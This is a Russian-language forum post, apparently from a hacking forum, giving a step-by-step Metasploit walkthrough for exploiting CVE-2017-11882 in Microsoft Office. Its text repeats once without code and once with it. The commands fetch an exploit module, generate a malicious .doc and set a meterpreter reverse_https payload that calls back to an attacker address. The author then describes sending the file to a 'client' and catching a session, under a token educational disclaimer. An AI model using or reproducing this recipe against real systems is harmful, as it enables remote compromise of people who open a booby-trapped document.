Добрый день.
Один доллар (@OneDollar) показал пример эксплуатации уязвимости через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа
Мы рассмотрим альтернативный вариант через Metasploit:
Скачаем и перенесём експлоит
Запускаем metasploit и выбираем наш модуль.
Просмотрим информацию о модуле
Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?
Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой
Можно поставить и *.rtf, отработает и так и так.
Добавляем пейлоад и запускаем
Собственно, всё.
Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
Запускаем, ловим сессию.
AV так же не стоит на месте
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)
Информация дана для ознакомления, спасибо за внимание)
Альтернативный вариант пост эксплуатации через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа
Один доллар (@OneDollar) показал пример эксплуатации уязвимости через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа
Мы рассмотрим альтернативный вариант через Metasploit:
Скачаем и перенесём експлоит
Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
Запускаем metasploit и выбираем наш модуль.
Код:
service postgresql start
msfconsole
use exploit/windows/fileformat/office_ms17_11882
Просмотрим информацию о модуле
Код:
info
Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?
Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой
Код:
set FILENAME /root/exp.doc
Можно поставить и *.rtf, отработает и так и так.
Добавляем пейлоад и запускаем
Код:
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit
Собственно, всё.
Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
Запускаем, ловим сессию.
AV так же не стоит на месте
Ссылка скрыта от гостей
Информация дана для ознакомления, спасибо за внимание)
Альтернативный вариант пост эксплуатации через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа